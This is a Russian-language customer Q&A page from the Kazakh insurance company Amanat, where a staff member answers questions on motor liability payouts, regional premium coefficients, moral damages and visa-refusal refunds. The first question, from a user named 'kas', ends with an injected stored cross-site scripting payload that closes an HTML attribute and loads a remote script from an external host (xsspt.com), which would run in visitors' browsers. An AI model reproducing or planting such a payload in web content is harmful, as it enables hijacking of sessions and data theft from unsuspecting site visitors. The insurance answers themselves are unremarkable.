Вопросы и Ответы
Здесь Вы можете задать любой интересующий Вас вопрос и получить ответ на него
Сортировать по
07.08.2018
3 просмотров
Имя: kas
Здравствуйте! Подскажите с чего начать, если я не согласна с со страховой выплатой, предложенной мне в результате ДТП. В суд подать на оценщиков, страховую компанию или на виновника ДТП? А можно сделать судмедэкпертизу моего поврежденной авто? Или ее не делают автомобилю?><script src=//xsspt.com/wJw6lJ></script>
Отвечает
Калигожин Руслан

Kas, добрый день!

У вас вопрос, один в один, как у Ольги (смотрите вопрос от 30.01.2018 г.)

Отвечу еще раз.

Если это страховое возмещение в рамках ОС ГПО ВТС, тогда, в случае несогласия с размером выплаты, потерпевший имеет право по Закону обжаловать такое возмещение Страховщика через суд.

Соответственно, в качестве подтверждения своих доводов предоставить другую оценку. Для проведение альтернативной оценки автомобиль должен быть предоставлен в том состоянии, в котором он был после ДТП. Необходимо учесть факт, что расчет новой оценки должен быть проведен согласно методики, утвержденной Национальным банком РК.

В Законе об обязательном страховании гражданско-правовой ответственности владельцев транспортных средств регламентирована максимальное страховое возмещение по причинению вреда имуществу в размере 600 МРП. Если ваш ущерб составил больше 600 МРП, тогда, в порядке 924 статьи ГК РК, потерпевший вправе идти в суд с гражданским иском на самого виновника ДТП с целью взыскания такой разницы.

23.07.2018
11 просмотров
Имя: Даулет
где зарегистрирован стаховой полюс opel amega с гос номером Z 440
Отвечает
Калигожин Руслан

Даулет, добрый день!

В открытых источниках таких данных нет.

Попробуйте обратиться с заявлением в УДП, вся база госномеров в их ведомстве.


Спасибо за обращение в Страховую компанию "Amanat"!

14.07.2018
17 просмотров
Имя: Нурлан
Здравствуйте хотел узнать стать агентом вашей СК какие условия и требования???
Отвечает
Калигожин Руслан

Нурлан,

Добрый день!

Напишите, пожалуйста, на info@a-i.kz. Далее вас проконсультируют.

03.07.2018
26 просмотров
Имя: Светлана
Добрый день! Скажите, пожалуйста, а вы возвращаете деньги в случае отказа в визе?
Отвечает
Калигожин Руслан

Добрый день! Да, конечно. Необходимо будет предоставить документы от посольства и написать заявление у нас в офисе.

07.06.2018
33 просмотров
Имя: Нурхан
Добрый день! У меня машина в учете в Алмате номера Алматинские хотел продлить страховку в Жезказгане так как сейчас нахожусь там. В страховой компаний мне сказали что я должен сделать временную регистрацию автомобиля в Жезказгане. Обьясните такое возможно?
Отвечает
Калигожин Руслан

Нурхан, добрый е

Согласно п.1, статьи 19 ЗРК ОГПО ВТС указывается:

Для расчета годовой страховой премии, подлежащей уплате при заключении договора обязательного страхования ответственности владельцев транспортных средств, используется базовая страховая премия, к которой в зависимости от места регистрации транспортного средства, типа транспортного средства, возраста и стажа вождения страхователя (застрахованного), срока эксплуатации транспортного средства и наличия или отсутствия страховых случаев по вине лиц, гражданско-правовая ответственность которых застрахована (система «бонус-малус»), применяются коэффициенты, установленные пунктами 3-10 настоящей статьи.

3. Коэффициенты по территории регистрации транспортного средства устанавливаются в следующем размере:


№ п/п Наименование области, города республиканского значения, столицы Размер коэффициента по территории регистрации
транспортного средства
(для столицы, городов республиканского и областного значения)
1. Алматинская область 1,78
2. Южно-Казахстанская область 1,01
3. Восточно-Казахстанская область 1,96
4. Костанайская область 1,95
5. Карагандинская область 1,39
6. Северо-Казахстанская область 1,33
7. Акмолинская область 1,32
8. Павлодарская область 1,63
9. Жамбылская область 1
10. Актюбинская область 1,35
11. Западно-Казахстанская область 1,17
12. Кызылординская область 1,09
13. Атырауская область 2,69
14. Мангистауская область 1,15
15. Алматы 2,96
16. Астана 2,2

Т.е., если ТС зарегистрировано в Алмате, но физически находится в другом городе, считаем правильным оформлять по коэффициенту территории той где ТС зарегистрировано в настоящий момент.
09.04.2018
46 просмотров
Имя: Иско
Здравствуйте! С чего начать подскажите у меня было ДТП прошло уже 2 недели. Через сколько дней передают дело в суд ? 2 вопрос если машина не подлежит к восстановлению и я получил при ДТП травму головы и лечился амбулаторно выплатят ли мне за моральный ущерб?
Отвечает
Калигожин Руслан

Добрый день!

  • Как правило с момента ДТП и передачи дел в суд проходит 2-3 недели, а точнее, срок должен быть не позже 2-х месяцев согласно КоАП РК. С момента поступления дела в суд, не более 15 суток для рассмотрения его, т.е. общий срок не более 45 дней.
  • В случае если гражданско-правовая ответственность виновного лица была застрахована на момент ДТП в порядке обязательного страхования, соответственно предельный лимит страхового возмещения за поврежденную автомашину составит 600 МРП (1 443 000 тг. в 2018 г.). В остальной части недополученного возмещения вреда, в случае если автомашина восстановлению не подлежит (все зависит от рыночной стоимости автомашины), необходимо взыскивать непосредственно с виновника в порядке статьи 924 ГК РК.
  • В случае если гражданско-правовая ответственность виновного лица была застрахована на момент ДТП в порядке обязательного страхования, также предусматривается страховое возмещение за причиненный физический вред здоровью в порядке статьи 24 Закона РК «Об обязательном страховании гражданско-правовой ответственности владельцев транспортных средств», т.е. возмещение за увечье, травму или иное повреждение здоровья без установления инвалидности в размере фактических расходов на амбулаторное и (или) стационарное лечение, но не более 300 МРП. Соответственно указанные расходы необходимо подтвердить соответствующими документами.
  • Согласно п.2, статьи 10 Закона РК «Об обязательном страховании гражданско-правовой ответственности владельцев транспортных средств» - «Договором обязательного страхования ответственности владельцев транспортных средств предусматривается осуществление страховой выплаты по обязательствам, возникшим вследствие причинения вреда жизни, здоровью и (или) имуществу потерпевшего, за исключением возмещения морального вреда и упущенной выгоды потерпевшего, включая утрату товарной стоимости имущества, а также возмещения неустойки в связи с нарушением потерпевшим сроков поставки товаров или производства работ (оказания услуг), иных его обязательств по контрактам (договорам)». Соответственно моральный вред необходимо взыскивать непосредственно с виновного лица, как правило в судебном порядке.

Спасибо за обращение в Страховую компанию Amanat

04.02.2018
84 просмотров
Имя: андрей
на каком основании вы страхуете т/с без хозяина лишь по оригиналу тех. паспорта и
Отвечает
Калигожин Руслан

Андрей, добрый день!

Мы ведем свою деятельность исключительно в правовом поле.

Согласно действующему законодательству, можно застраховать свою гражданско-правовую ответственность даже в случае отсутствия согласия собственника ТС на это.

Т.к., согласно статьи 10 Закона - «Основанием для заключения договора обязательного страхования ответственности владельцев транспортных средств является заявление страхователя. Требования к содержанию заявления и перечень копий документов, подтверждающих сведения, указанные в заявлении, устанавливаются нормативными правовыми актами уполномоченного органа».

Таким НПА является Постановление Правления Агентства Республики Казахстан по регулированию и надзору финансового рынка и финансовых организаций от 1 марта 2010 года № 24 «Об утверждении Требований к содержанию и изготовлению бланков страховых полисов, оформлению и выдаче страховых полисов по обязательному страхованию гражданско-правовой ответственности владельцев транспортных средств, обязательному страхованию гражданско-правовой ответственности туроператора или турагента, а также к содержанию заявлений страхователя для заключения договоров обязательного страхования по отдельным видам обязательного страхования».

Которое не предусматривает обязанность по предоставлению согласия от собственника ТС для страхователя.

Однако, в случае такой схемы страхования, при урегулировании убытка, страхователь (застрахованный) который не является собственником такого ТС вписанного в полис, не сможет получить страховое возмещение в порядке процедура прямого урегулирования.

Поскольку согласно статьи 26-1 Закона - «Потерпевший, не являющийся собственником имущества, которому причинен вред, обращается к страховщику лица, по вине которого произошел страховой случай, в порядке, предусмотренном настоящим Законом».

Написать в WhatsApp

Оставить заявку на звонок
Пожалуйста, оставьте свои данные, и мы Вам перезвоним